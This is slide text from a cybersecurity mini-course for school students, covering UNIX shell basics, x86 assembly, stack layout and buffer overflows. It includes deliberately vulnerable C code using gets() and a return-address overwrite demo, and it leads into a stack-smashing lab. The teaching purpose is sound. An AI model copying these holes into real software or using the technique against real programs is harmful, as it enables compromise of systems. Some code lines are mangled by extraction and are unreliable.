CS 519: Operating System Theory

CS 519: Operating System Theory

JerseySTEM Mini-course in Cyber-Security Course designed by Prof. Vinod Ganapathy, Rutgers University 1 Slide #1-1 About this course: Audience Intended audience: Late-stage middle-school and early-stage high-school students (7th-10th graders) Pre-requisites: Some programming experience, in any language of your choice. Rudimentary knowledge should suffice, but you should be willing to learn.

Some exposure to the UNIX shell. Willingness to learn new languages and concepts! 2 Slide #1-2 About this course: Contents What you will learn: Basic cyber-security concepts. Some black-hat hacking skills (how to attack). Some white-hat hacking skills (how to defend). The course will be a mix of theory and hands-on practice. The theory will teach you the concepts and the hands-on exercises will reinforce the theoretical concepts. 3

Slide #1-3 About this course: A warning Why teach both black-hat and white-hat skills? Because youve to know thy enemy To effectively defend, you have to know how attackers think This does not give you the license to show off your black-hat hacking skills. You can get into deep trouble with lawenforcement if you do so. Consider yourself warned! 4 Slide #1-4 Computer security is the study of Weaknesses in systems and attacks

against them. Defending against such attacks Pro-actively protecting data against various attacker models 5 Slide #1-5 Goals of computer security Think of what you would want from your ideal anti-virus: Prevent your files from getting corrupted. Prevent your identity/credit-card number from being stolen Avoid giving your password to phishing websites (many more examples)

6 Slide #1-6 Goals of computer security We can abstract the goals into a convenient acronym: C.I.A. Confidentiality Keeping data and resources hidden from attacker Integrity Protecting data from unauthorized modification by attackers Availability Enabling legitimate access to data and resources

7 A secure system Is a computer that is connected to the Internet an example of a secure machine? Can you protect Confidentiality, Integrity and Availability of data on such a machine? Lets look at these in turn. 8 Slide #1-8 A secure system Is a computer that is connected to the Internet an example of a secure

machine? Protecting Confidentiality: We routinely read of malicious software and attacks that steal credit card numbers, steal identity, steal passwords, etc. These attacks violate data confidentiality. 9 Slide #1-9 A secure system Is a computer that is connected to the Internet an example of a secure machine? Protecting Integrity: Think of ransomware: What does it do? It encrypts your files and prevents you from

accessing the data in the files. These attacks violate data integrity. 10 Slide #1-10 A secure system Is a computer that is connected to the Internet an example of a secure machine? Protecting Availability: Denial of service (DOS) attacks routinely prevent you from accessing websites. Recent example: Mirai botnet DOSed Dyn (October 2016) Violated data availability. 11

Slide #1-11 A secure system Let us disconnect the computer from the Internet. Sacrifices some data availability but maybe were willing to live with that. Does it protect data confidentiality? No! You can still exfiltrate data out of the machine (think USB sticks!) Does it protect data integrity? No! You can still infect the machine with malicious software (again, think USB sticks). 12 . A secure system Now, let us disconnect the computer from the

Internet, and switch it off! Is it secure? No! Data that is stored on hard disks can still be recovered by bad guys using forensic tools. There are other kinds of sophisticated attacks too: Exercise: Google Cold Boot Attack and read the associated Wikipedia article 13 So, what is a secure system? The answer to that question is it depends. If you assume a very powerful adversary, you will need very powerful defences to achieve even basic confidentiality and integrity. What you assume about the adversary (i.e., attacker) is called the threat model . 14

Threat Models in practice Network-based (or remote) attacker: Is located remotely, and connected to the victims machine via a network link. Can send and receive packets to the victims machine. This is the threat model that is most used in practice. For most of this course, we will work with this threat model. 15 Slide #1-15 Threat Models in practice Local attacker:

Has an account to log into the victims machine. Perhaps even has physical access to the machine itself. Example: Snowden attacks? Other insider attacks. Makes several restricting assumptions about the adversary, so we wont use it in the course. 16 Slide #1-16 Course plan We will start with an overview of the working environment: 1. Basics of UNIX shell, compiling

programs, and command-line tools. 2. Simple C programs and their assemblylanguage programs. 3. Learning to read assembly code. 4. Learning to execute and inspect code within a debugger (gdb) 17 Slide #1-17 Course plan Next up will be on buffer overflows, a major cybersecurity threat: You will learn the low-level details of how this threat works. You will be designing exploits and work through an obstacle course [Each exploit harder than the previous one!]

18 Slide #1-18 Course plan If you learn how to attack, you should also learn how to defend! We will study various popular deployed buffer overflow defences and learn how you can apply them. Often tested in competitions like Cyber Patriot! 19 Slide #1-19

Introduction to the UNIX shell and command line, compilers and debuggers Using the UNIX shell This will be an interactive introduction to using the UNIX shell. You have each been given a virtual machine with the Ubuntu Linux distribution installed Click on the Ubuntu VM to launch it. After booting up, it will show a login screen. Type the login name root and use the password root. 21 21 Using the UNIX shell

Congratulations! You are on the UNIX shell. You can now try each one of these commands in the virtual machine as you learn about them on the slides. This virtual machine will be the environment you use for the rest of the course. 22 22 Contents Shell Intro Command Format Shell I/O Command I/O Command Overview Some content on UNIX shell commands borrowed from material originally created by S.

Mokhov, Concordia Univ 23 23 Shell Intro A system program that allows a user to execute: shell functions (internal commands) other programs (external commands) shell scripts Linux/UNIX has a bunch of them, the most common are tcsh, an expanded version of csh (Bill Joy, Berkley, Sun) bash, one of the most popular and rich in functionality shells, an expansion of sh (AT&T Bell Labs). Your VM uses the bash shell ksh, Korn Shell ...

24 24 Command Format Format: command name and 0 or more arguments: % commandname [arg1] ... [argN] By % sign I mean prompt here and hereafter. Arguments can be options (switches to the command to indicate a mode of operation) ; usually prefixed with a hyphen (-) or two (--) in GNU style non-options, or operands, basically the data to work with (actual data, or a file name) 25 25

Shell I/O Shell is a power-user interface, so the user interacts with the shell by typing in the commands. The shell interprets the commands, that may produce some results, they go back to the user and the control is given back to the user when a command completes (in general). In the case of external commands, shell executes actual programs that may call functions of the OS kernel. These system commands are often wrapped around a socalled system calls, to ask the kernel to perform an operation (usually privileged) on your behalf. 26 26 Input to shell:

Command I/O Command name and arguments typed by the user Input to a command: Keyboard, file, or other commands Standard input: keyboard. Standard output: screen. These STDIN and STDOUT are often together referred to as a terminal. Both standard input and standard output can be redirected from/to a file or other command. File redirection: < input > output >> output append 27

27 Commands As you see each command, try it out on the virtual machine. 28 Manual Pages man The first command to remember Contains info about almost everything :-) other commands system calls c/library functions

other utils, applications, configuration files To read about man itself type: % man man NOTE: unfortunately theres no % man woman ... 29 29 which Displays a path name of a command. Searches a path environmental variable for the command and displays the absolute path. To find which tcsh and bash are actually in use, type: % which tcsh % which bash

% man which for more details 30 30 chsh Change Login Shell Login shell is the shell that interprets commands after you logged in by default. You can change it with chsh (provided that your system admin allowed you to do so). To list all possible shells, depending on implementation: % chsh -l % cat /etc/shells % chsh with no arguments will prompt you for the shell. 31

31 whereis Display all locations of a command (or some other binary, man page, or a source file). Searchers all directories to find commands that match whereis argument % whereis tcsh 32 32 passwd Change your login password. A very good idea after you got a new one. Its usually a paranoid program asking your password to

have at least 6 chars in the password, at least two alphabetical and one numerical characters. Some other restrictions (e.g. dictionary words or previous password similarity) may apply. Depending on a privilege, one can change users and group passwords as well as real name, login shell, etc. % man passwd 33 33 date Guess what :-) Displays dates in various formats % date % date -u in GMT

% man date 34 34 cal Calendar % cal current month % cal 2 2000 Feb 2000, leap year % cal 2 2100 not a leap year

% cal 2 2400 leap year Years range: 1 - 9999 % cal 9 1752 11 days skipped No year 0 % cal 0 error % cal 2002

whole year for month entire year Calendar was corrected in 1752 removed 11 days 35 35 clear Clears the screen Theres an alias for it: Ctrl+L Example sequence: % cal

% clear % cal Ctrl+L 36 36 sleep Sleeping is doing nothing for some time. Usually used for delays in shell scripts. % sleep 2 2 seconds pause 37 37 Command Grouping

Semicolon: ; Often grouping acts as if it were a single command, so an output of different commands can be redirected to a file: % (date; cal; date) > out.txt 38 38 alias Defined a new name for a command % alias with no arguments lists currently active aliases % alias newcommand oldcommand defines a newcommand % alias cl cal 2003

% cl 39 39 unalias Removes alias Requires an argument. % unalias cl 40 40 history Display a history of recently used commands

% history % !n repeat command n in the history % !-1 all commands in the history repeat last command = !! % history 10 % !-2 last 10

repeat second last command % history -r 10 % !ca reverse order repeat last command that begins with ca % !! repeat last command 41 41 exit / logout

Exit from your login session. % exit % logout 42 42 shutdown Causes system to shutdown or reboot cleanly. May require superuser privileges % shutdown -h now - stop % shutdown -r now - reboot

43 43 ls List directory contents % ls -F Has whole bunch of options, see man ls for details. % ls all files except those starting with a . append / to dirs and * to executables

% ls -l long format % ls -al % ls -lt % ls -a sort by modification time (latest - earliest) all % ls -A % ls -ltr

all without . and .. reverse 44 44 cat Display and concatenate files. % cat Will read from STDIN and print to STDOT every line you enter. % cat file1 [file2] ... Will concatenate all files in one and print them to STDOUT % cat > filename Will take whatever you type from STDIN and will put it into the file filename

To exit cat or cat > filename type Ctrl+D to indicate EOF (End of File). 45 45 more / less Pagers to display contents of large files page by page or scroll line by line up and down. Have a lot of viewing options and search capability. Interactive. To exit: q 46 46 less

less ("less is more") a bit more smart than the more command to display contents of a file: % less filename To display line numbers: % less -N filename To display a prompt: % less -P"Press 'q' to quit" filename Combine the two: % less -NP"Blah-blah-blah" filename For more information: % man less 47

47 touch By touching a file you either create it if it did not exists (with 0 length). Or you update its last modification and access times. There are options to override the default behavior. % touch file % man touch 48 48 cp Copies files / directories. % cp [options]

% cp file1 file2 % cp file1 [file2] /directory Useful option: -i to prevent overwriting existing files and prompt the user to confirm. 49 49 mv Moves or renames files/directories. % mv Thegets removed % mv file1 dir/ % mv file1 file2 rename

% mv file1 file2 dir/ % mv dir1 dir2 50 50 rm Removes file(s) and/or directories. % rm file1 [file2] ... % rm -r dir1 [dir2] ... % rm -r file1 dir1 dir2 file4 ... 51 51 script

Writes a log (a typescript) of whatever happened in the terminal to a file. % script [file] % script all log is saved into a file named typescript % script file all log is saved into a file named file To exit logging, type: % exit 52 52 find Looks up a file in a directory tree. % find . -name name

% find . \(-name w* -or -name W* \) 53 53 mkdir Creates a directory. % mkdir newdir Often people make an alias of md for it. 54 54 cd Changes your current directory to a new one. % cd /some/other/dir

Absolute path % cd subdir Assuming subdir is in the current directory. % cd Returns you to your home directory. 55 55 pwd Displays personal working directory, i.e. your current directory. % pwd 56

56 rmdir Removes a directory. % rmdir dirname Equivalent: % rm -r dirname 57 57 ln Symbolic link or a shortcut in M$ terminology. % ln s

58 58 chmod Changes file permissions Possible invocations % chmod 600 filename -rw------- 1 user group 2785 Feb 8 14:18 filename (a bit not intuitive where 600 comes from) % chmod u+rw filename (the same thing, more readable) For the assignment: % chmod u+x myshellscript (mysshellscript is now executable) -rwx------ 1 user group 2785 Feb 8 14:18 myshellscript 59

59 grep Searches its input for a pattern. The pattern can be a simple substring or a complex regular expression. If a line matches, its directed to STDOUT; otherwise, its discarded. % echo blah-foo | grep blah Will print the matching line % echo blah-foo | grep zee Will not. See a separate grep tutorial. 60 60

Pipes What's a pipe? is a method of interprocess communication (IPC) in shells a '|' symbol used it means that the output of one program (on one side of a pipe) serves as an input for the program on another end. a set of "piped" commands is often called a pipeline Why it's useful? Because by combining simple OS utilities one can easily solve more complex tasks 61 61 Editors: vim/emacs

To edit a file, you use an editor. Both vim and emacs are very good editors. Choose one and learn how to use it. Lots of online resources for new users of emacs and vim. % vim foo.txt This opens up a new file called foo.txt. Learn to type some content in it, save it, etc. 62 62 Compilers: gcc When you write code (e.g., a C program), it must be compiled before it can be executed. The compiler converts C code into a format that the machine can understand. This is called the binary executable or binary code.

63 63 Compilers: gcc 64 64 Compilers: gcc To compile a C program called foo.c % gcc foo.c o foo.out This produces a binary executable called foo.out, which you can execute as follows: ./foo.out [any inputs to foo] By default, if you dont specify foo.out, the output file is called a.out

65 65 Compilers: gcc If you want to compile a C program, you can use the C program in function_call_example.c or gets_example.c to try out the compiler. 66 66 Disassemblers: objdump You may be curious to see the code in foo.out. This code will be in hexadecimal notation, which is not humanreadable. But there is an equivalent human-readable notation, called

assembly code. This notation expresses the code in terms of the instructions of the processor. This process of inspecting the assembly code is called disassembly 67 67 Disassemblers: objdump % objdump D foo.out. You can disassemble the file called a.out that you got by compiling the previous C file if you would like to try objdump. You might not understand the output of objdump just yet, but we will be learning to read and understand assembly code in much more detail very soon!

68 68 Debuggers: gdb Debuggers let you reason about the runtime behaviour of a program. You can use debuggers to understand why a program is crashing or not behaving as expected. You can also use debuggers to inspect the state of the program as it runs, e.g., observing the values stored at different memory locations and registers. 69 69

Debuggers: gdb Debuggers are very useful in creating attacks against vulnerable programs and to understand how to defend against them. You will be extensively using the debugger later in this course. You can invoke the debugger using % gdb a.out Once youre in, type help to learn how to use various aspects of the debugger 70 70 A primer of the x86 assembly language

X86 primer In the next unit, we will be extensively using x86 instructions. So let us review some basic x86 instructions that we will encounter, and understand their functionality The x86 instruction set is vast and complex. This is by no means a comprehensive overview! We are only reviewing basic instructions. The handout x86.pdf on the class webpage covers stuff in some more detail, and is optional reading for interested students. 72 X86 primer A programs code contains binary instructions: CPU executes one instruction at a time Usually executes next sequential instruction in memory Branch/jump/call inst species different next instruction

Instructions typically manipulate Registers (a small number of values kept by processor) and Memory 73 X86 primer Most instructions are two operand instructions. Unfortunately, there are two popular syntaxes (formats) to represent these instructions: Intel format: OP DST, SRC AT&T (gcc) format: OP SRC, DST We will stick to the AT&T syntax 74 X86 primer X86 instructions refer to registers. On the Intel x86, there are several registers, represented as %eax, %ebx, %ecx,

%edx, etc. There are also two special purpose registers called %esp (the stack pointer) and %ebp (the base pointer). We will study the role of these special purpose registers in the next unit X86 instructions can also refer to constant values and memory locations. It is best to understand these things using examples. 75 X86 primer movl %eax, %edx: This instruction copies the value stored in the register eax into the register edx, i.e., edx = eax movl $0x123, %edx: This instruction stores the constant value 0x123 (hexadecimal) in the register edx movl 0x124, %edx: this instruction copies the value stored at memory address 0x124h to register edx. You can think

of memory as containing a number of slots, each of which has an address. In this case, the contents stored at address 0x124h are being copied into edx. 76 X86 primer movl (%ebx), %edx: Here, the processor looks up what is stored in %ebx, treats it as an address, and stores the value at that address into edx. For those familiar with Clike syntax, this is essentially edx = *(ebx) movl 4(%ebx), %edx: Here, the processor looks up what is stored in %ebx, adds 4 to that address, and stores the value at that newly-computed address into edx. For those familiar with C-like syntax, this is edx = *(ebx+4) 77 X86 primer

There are common arithmetic instructions, addl (for adding two values, subl (for subtracting one value from another), etc. addl %edx, %eax: adds the value of edx to eax, i.e., eax = eax + edx. subl %edx, %eax: subtracts the value of edx from eax, i.e., eax = eax edx. The push and pop instructions push and pop values from a stack: the concept of a stack will become clear in the next unit. For now, this is all the instructions we will need to understand. We will also need the call and ret instruction, but we will visit them in the upcoming unit. 78 Exploiting Buffer Overflow Vulnerabilities

What is a buffer overflow? CA Oroville dam overflow, 2/2017, PC: SFGate 80 What is a buffer overflow? The dam analogy You have some buffer space---the reservoir---to hold some resources--the water. What happens if you store more water in the reservoir than there is space in the reservoir? The water overflows from the side, causing large amounts of damage to the countryside. The same thing happens on a computer system when you have a buffer overflow in a program But what is a buffer in a computer program? And what sorts of damage can a buffer overflow do?

81 What is a buffer overflow? A kind of programming error that often happens in C and C++ programs At its heart: Your program allocated some space in memory to store some data (the buffer) But you wrote more data into the buffer than there is space to accommodate it. What this learning unit is all about: How bad guys have exploited this simple programming error to launch devastating security attacks 82 A long history of famous exploits Buffer overflow vulnerabilities have resulted in numerous high-profile exploit incidents:

Morris worm (1988) the first recorded computer worm Code Red (2001) Sasser worm (2004) ... (numerous others in the intervening years!) Most recent high-profile incident: Heartbleed (2014) Exercise: What is the difference between a vulnerability and an exploit? 83 Closer to the goals of this course Most online capture-the-flag-style cyber security competitions feature programs that have buffer overflow vulnerabilities. Competitors are tasked with finding where the vulnerabilities lie and to exploit them. 84

Buffer overflow example: Benign example int foo(void){ char buf[8]; strcpy(buf, hello world); } What does this program do? What is the functionality of the strcpy statement? Why is there a buffer overflow? The program allocated 8 bytes for buf, but wrote 12 bytes into it (including the \0 character at the end of hello world) Is this buffer overflow vulnerability exploitable?

Likely not. A constant string is written into a buffer. This is an example of a benign buffer overflow. 85 Buffer overflow example: Malicious example int get_user_input(void){ char buf[1024]; gets(buf); } What does this program do? What is the functionality of the gets statement? Why is there a buffer overflow? The program allocated 1024 bytes for buf. But gets reads user input from the command line and writes it into buf. Gets will continue to read input until it encounters a \0 character on

the command line, potentially writing more than 1024 bytes into buf. 86 Buffer overflow example: Malicious example int get_user_input(void){ char buf[1024]; gets(buf); } So why is this dangerous? In this learning unit, we will learn that: This can be used by an attacker to feed arbitrary inputs to the program that executes the above code snippet

The attacker can use these inputs to completely take over the control of the program containing the above code snippet. Which means he can do whatever the program does: read all its data, write over all its data, etc. Compromises both confidentiality and integrity! 87 Gets-based program int get_user_input(void){ char buf[1024]; gets(buf); }

Navigate to the gets_example directory and open gets_example.c within your virtual machines and study the program. (Type cat gets_example.c) Now compile it: Type gcc gets_example.c The compiler emitted a warning about gets being deprecated. What was the warning and what does it mean? Do you see a file called a.out created by the compiler? 88 Gets based program int get_user_input(void){ char buf[1024]; gets(buf); } Now run a.out: Type ./a.out on the command line.

It waits for your input: give it some input and observe the programs behaviour. Can you try to crash the program by giving it arbitrary inputs? 89 Gets-based program int get_user_input(void){ char buf[1024]; gets(buf); } Feeding a long input to the program gets pretty painful, doesnt it? Fortunately, we have created a long input for you: See the contents of the file input.txt: Type cat input.txt on

the command line. How do you feed the contents of input.txt to your program? 90 Gets based program int get_user_input(void){ char buf[1024]; gets(buf); } Use the UNIX pipe facility. The UNIX pipe is a redirection mechanism that lets one program consume the output of the other. `cat input.txt | ./a.out 91

Gets based program int get_user_input(void){ char buf[1024]; gets(buf); } `cat input.txt | ./a.out Now what does your program do? Why does it terminate with a Segmentation fault? What is a Segmentation fault? Hint: it has something to do with the notion of x86 segments that you studied in the x86 unit.

Is the output identical to the contents of input.txt? Why not? 92 How attackers locate buffer overflow vulnerabilties What you just did is a simple example of fuzzing: Fuzzing stands for the practice of feeding random inputs to a program and observing its behaviour. If it crashes with a segmentation fault, there is very likely a buffer overflow vulnerability in the program. That is the first step that hackers often use to exploiting the program. There are other methods too: source code inspection (if the source code is available), machine code inspection, etc.

93 Understanding process layouts To exploit a buffer overflow, we first need to understand the concept of a process A process is the in-memory representation of a running program. In the example you just worked on `a.out is the program, and the process was created when you ran it using ./a.out 94 Understanding process layouts To exploit a buffer overflow, we first need to understand the concept of a process A process is the in-memory representation of a running program.

A process contains the data structures allocated in the program and the code you wrote for the program. The code operates on and manipulates the data structures. You need to understand the layout of code and data in a process before you exploit it. 95 Understanding process layouts To exploit a buffer overflow, we first need to understand the concept of a process Program Run Memory

Representation of a Process 96 Code and data layout Within a process all data is stored an array of bytes Interpretation depends on instructions (i.e., code) used C and C++ based programs allow the code to directly access memory (and dont check bounds) Hence are vulnerable to buffer overflow exploits 97 Process address space Every process has an address space in memory

The address space is the set of memory addresses that are accessible to the process. Every address can store a piece of data, usually one byte long. Computers understand binary (or hexadecimal notation) and so we represent these addresses as hexadecimal numbers. 98 Process address space On a 32-bit processor, the address space has addresses going from: 0x00000000 (in hexadecimal notation) to 0xFFFFFFFF

0x00000000 is called the bottom of the address space, while 0xFFFFFFFF is the top of the address space Look at the picture on the right to see how the process is laid out from the top of the address space (top of memory) to the bottom of the address space (bottom of memory). 99 Process address space Look in the address space for something called the stack

Every program has a stack. The stack is dynamic in that it can grow and shrink as the program executes. 100 Process address space Look in the address space for something called the stack

Every program has a stack. The stack is dynamic in that it can grow and shrink as the program executes. The stack grows every time a function in the program is called and shrinks when the function returns. 101

Process address space The stacks base is located at a fixed address in the address space. The top of the stack is the most recent entry of the stack, while the base contains the oldest entries. The stack is an example of a

data structure. Very much like a stack of cafeteria plates. Push to the top, pop from top. 102 Process address space Each function in the program gets an entry in the stack when the function is called. The stack entry reserves space for that functions local variables.

Let us now look at an example program and its stack. 103 Let us look at a program with two functions void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } void main() { foo(1, 2, 3); }

To start off, let us suppose that the program has started execution as a process, and that we are in the main function. On the right, we have the stack entry for main. 104 Let us look at a program with two functions Bottom void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } Top void main() {

foo(1, 2, 3); } The bottom of the stack and the top of the stack are shown. Right now, the stack only has one entry. 105 Let us look at a program with two functions Bottom void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } Top

void main() { foo(1, 2, 3); } On Intel x86, the stack grows DOWNWARDS, so the bottom and the top are not where youd expect them. KEEP THIS FACT IN MIND MOVING FORWARD! 106 Let us look at a program with two functions ebp void foo(int a, int b, int c){ char buf1[8]; char buf2[12];

} void main() { foo(1, 2, 3); } The Intel x86 uses two special registers, ebp and esp, to denote the bottom of the current stack entry and the top of the current stack entry, respectively. 107 esp Let us look at a program with two functions ebp

void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } void main() { foo(1, 2, 3); } Now suppose we execute the statement where main calls the function foo. A new stack entry is pushed to the top of the stack for the function foo. But several things happen before that. 108 esp

Let us look at a program with two functions ebp void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } void main() { foo(1, 2, 3); } The arguments to the function foo are pushed to the top of the stack in reverse order. 109

esp 3 Let us look at a program with two functions ebp void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } void main() { foo(1, 2, 3); } The arguments to the function foo are pushed to the top of the stack in reverse

order. 110 esp 3 2 Let us look at a program with two functions ebp void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } void main() {

foo(1, 2, 3); } Notice: How the value of esp kept changing as the values of the function arguments were pushed on the stack. Note: Depending on your compiler, arguments may be pushed by main or foo. 111 esp 3 2 1

Let us look at a program with two functions ebp void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } void main() { foo(1, 2, 3); } Each such argument is 4 bytes in length (the size of an integer on Intel x86/32). So esps value reduced by 12 (3 arguments of 4 bytes each) from when the function was just called.

112 esp 3 2 1 Why push in reverse order? ebp void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } void main() { foo(1, 2, 3);

} Open the directory function_call_example and the C file there. Compile it and observe the assembly code (for your convenience: assembly.txt). Navigate to the assembly code of main. 113 esp 3 2 1

Why push in reverse order? ebp void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } esp void main() { foo(1, 2, 3); } Can you locate the instructions that push the arguments to

the stack? What does the instruction movl $0x3, 0x8(%esp) do? What do you think 0x8(%esp) represents? Hint: we have already seen this in the x86 primer 114 3 2 1 The call instruction ebp

void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } 3 2 1 esp void main() { foo(1, 2, 3); } The code executes the call instruction.

Notice that %esp got pushed down and a return address was pushed on to the stack. You dont see this explicitly in the assembly code, so whats going on? 115 return addr The call instruction ebp void foo(int a, int b, int c){

char buf1[8]; char buf2[12]; } 3 2 1 esp void main() { foo(1, 2, 3); } When you call a function, the processor somehow needs to remember where to return to. In this case, it is the instruction following the call to foo. In the code

example in the VM, it is the code for v = 1. 116 return addr The call instruction ebp void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } 3 2 1

esp void main() { foo(1, 2, 3); } Exercise: What is the address that is pushed on to the stack as the return address Answer: 0x8048417. Why? 117 return addr

After the call to foo ebp void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } void main() { foo(1, 2, 3); } 3 2 1 esp

Now the processor starts executing the code in foo. It starts with a push %ebp. Remember this instruction. We will come back to it later and examine why the processor does this. This would push the current value stored in the ebp register to the top of the stack. 118 return addr Value of ebp

After the call to foo void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } ebp void main() { foo(1, 2, 3); } 3 2 1 esp

The next instruction changes the value of ebp to the current value of esp. 119 return addr Value of ebp After the call to foo void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } 3 2

1 ebp void main() { foo(1, 2, 3); } And the instruction following that subtracts the value 0x20 (hexadecimal, i.e., 32 bytes) from the value of $esp Why do you think this happens? 120

esp return addr Value of ebp After the call to foo void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } 3 2 1 ebp void main() {

foo(1, 2, 3); } return addr Value of ebp buf2 As you may have guessed from this color-coding, a new stack entry is created for the body of the function foo. This stores space for the two buffers in the function esp 121

buf1 Why save %ebp? void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } 3 2 1 ebp void main() { foo(1, 2, 3); }

return addr Value of ebp buf2 Let us return to that push %ebp instruction. What was its purpose? Examine the state of the stack as it stands now, and the stack as it appeared before we started doing any of this. What remains invariant? esp 122 buf1

Why save %ebp? void foo(int a, int b, int c){ char buf1[8]; char buf2[12]; } 3 2 1 ebp void main() { foo(1, 2, 3); } return addr

Value of ebp buf2 Answer: %ebp always points to the bottom of the current stack entry, and %esp always points to the top. Question: Why did we save the old value of %ebp on the stack? esp 123 buf1 Why save %ebp? void foo(int a, int b, int c){

char buf1[8]; char buf2[12]; } 3 2 1 ebp void main() { foo(1, 2, 3); } return addr Value of ebp buf2

Answer: Look the instructions ret in the body of foo and the instruction buf1 esp 124 The return address What is the return address used for by the postal service? To identify the sender To know where to return any unreachable mail The return address in computer programs serves a similar purpose:

Identifies the location to which control must return after a function that was called has completed its job 125 The return address The return address that is stored on the stack is a very important aspect of ensuring correct operation of a program. If you tamper with the return address, you can change the way the programs control flow goes. Let us look at a simple, benign example of what happens when you tamper with the return address that is stored on the stack. 126 The leave and ret instructions Again, open function_call_example.c, and study the

assembly code for the function foo. Look at the last two instructions of the function. They are leave and ret. What do they do? Let us try to understand. 127 The leave and ret instructions When main calls foo, the stack looks like the left side of the picture below. When foo finishes its job and returns, the stack needs to be restored to its original state (right side) ebp 3 2 1 ebp

esp return addr Value of ebp buf2 buf1 esp 128 The leave and ret instructions Moreover, the control needs to return from foo to main ebp 3 2

1 ebp esp return addr Value of ebp buf2 buf1 esp 129 The leave and ret instructions The leave instruction in foo restores the value of %ebp to the saved value on the stack, and pops the saved return value from the stack.

The ret instruction changes the processors control to the return address stored on the stack, and pops the return address from the stack. When both these instructions execute, the stack is restored to its original state 130 Return address modification. void foobar(int a){ char buf[8]; int *ret; ret = buf + 24; *ret += 8; } void main() { int x; x = 0;

foobar(1); x = 1; printf (%d\n, x); } In your VM, go to the file benign_retaddr_modif.c The code shown there is roughly as shown on the left. Look at this program and guess what you think its output will be: in particular the output of printf? The body of main is just a straight line piece of code. So we would expect the output to be 1. Right? Now compile and run the program in your VM. The output is 0! Whats going on?

131 Return address modification. void foobar(int a){ char buf[8]; int *ret; ret = buf + 24; *ret += 8; } void main() { int x; x = 0; foobar(1); x = 1; printf (%d\n, x); } Something very strange is going on.

Comment out the call to foobar(1) in the main program, recompile the program and run it. Now what is the output? You see that it prints 1, as expected. So what is foobar doing that is causing printf to print 0? The body of foobar does not change the value of x directly. So how did printf print 0, and not 1? Lets find out. 132 Return address modification. void foobar(int a){ char buf[8]; int *ret;

ret = buf + 24; *ret += 8; } void main() { int x; x = 0; foobar(1); x = 1; printf (%d\n, x); } Uncomment the call to foobar(1), compile the program and look at its assembly code. It has been provided for you in assembly.txt Let us first see what the stack would look like when main calls foobar.

133 Return address modification. Let us first see what the stack would look like when main calls foobar. ebp 1 return addr Value of ebp It would look like the one shown alongside, with the stack entry for main shown in green, and the stack entry for foobar shown in yellow What is the difference in values

between %esp and %ebp? buf esp Answer: 24. Why? Hint: Look at the assembly code of foobar and see the quantity subtracted from esp. Ok, so %esp and %ebp are separated by 24 bytes. 134 Return address modification. The value of %ebp saved on the stack is 4 bytes. ebp

1 return addr Value of ebp buf So the return address is located exactly 28 bytes away from %esp Look at the source code of the program and look at the assembly code of foo. Can you locate the register that points to the beginning of buf? It is %ebx-14h. How do you know that? esp

Hint: look at the instruction called lea 0x14(%ebp), %eax The address of buf is 20 bytes (or 14h) below ebx. That address is stored in eax 135 Return address modification. The next instruction says add $0x18 %eax, which basically adds the value 18h to %eax. ebp 1 return addr Value of ebp

This corresponds to the source line `ret = buf + 24 So what stack location would the new value of %eax point to? buf eax It would point to the return address! (since the value of %ebp is 4 bytes long). This is denoted by the source variable `ret in the program esp 136

Return address modification. ebp 1 return addr Value of ebp The next instruction in the program increments the value stored at the address pointed-to by ret (i.e., *ret) by 8. So this would cause the program to return to another location. But which location? Lets find out. buf

eax esp 137 Return address modification. ebp x Look at the assembly code for main and locate the call to foobar. 1 return addr Value of ebp

The original return address must have been that of the address just following the call to foobar. What is that? 0x80484c5. buf eax esp What does that instruction do? It seems to be moving the value 1 to 0x1c(%esp). What is 0x1c(%esp)? It is the place where the variable x is stored in the stack entry of main! This instruction corresponds to x=1

in the program! 138 Return address modification. x ebp 1 return addr Value of ebp By incrementing the return address by 8 bytes, we are asking the processor to return to the instruction 0x80484cd instead of 0x80484c5! Thus, were effectively asking the

processor to skip over the instruction x=1. Thus, printf prints the value 0! buf eax esp 139 Return address modification. void foobar(int a){ char buf[8]; int *ret; ret = buf + 24; *ret += 8; }

void main() { int x; x = 0; foobar(1); x = 1; printf (%d\n, x); } Experiment: Change the statement *ret += 8 to various other values (e.g., *ret += 24). Recompile the program and run it.

What do you observe? Why? Experiment: Change the statement ret = buf + 24 to various other values (e.g., ret = buf + 28 or ret = buf + 32). Recompile the program and run it.

What do you you observe? Why? 140 Importance of the return address The previous exercise must have convinced you of the importance of the return address stored on the stack. And how modifying it can alter the control of the program. What would happen if we let an attacker control the return address stored on the stack?

What harm could it do? How could an attacker control the return address? Lets find out. 141 Importance of the return address Imagine this program. void foo(int a, int b, int c){ char buf[8]; gets(buf);

} ebp void main() { foo(1, 2, 3); } 3 2 1 What does gets do? Recall how you crashed a program that had gets in a previous exercise buf esp

142 return addr Value of ebp Importance of the return address Imagine this program. void foo(int a, int b, int c){ char buf[8]; gets(buf); } ebp void main() { foo(1, 2, 3); }

Gets allows an attacker to enter data into the buf. Since gets will keep writing into buf until it sees a \0, the attacker can keep writing into the buf, and possibly into other areas of the stack, including the return address. 3 2 1 buf He can use the input into buf to change the return address!

esp 143 return addr Value of ebp An obstacle course exercise Were now going to use what weve learned to start a multiple part obstacle course exercise, where you will learn how to modify return addresses on the stack like an attacker. The obstacle course is in multiple parts, and each obstacle will be harder than the previous one. We will work through Hands-only through each obstacle, and learn how to smash the stack (i.e., change return addresses). The optional reading for this part is the article

Smashing the Stack for Fun and Profit, by Aleph One This is linked from the webpage of the course. 144 An obstacle course exercise To begin the obstacle course, you will need to download and follow the instructions in the file called buflab.pdf available from the course webpage. Follow the instructions in buflab.pdf and become familiar with the following programs: Bufbomb

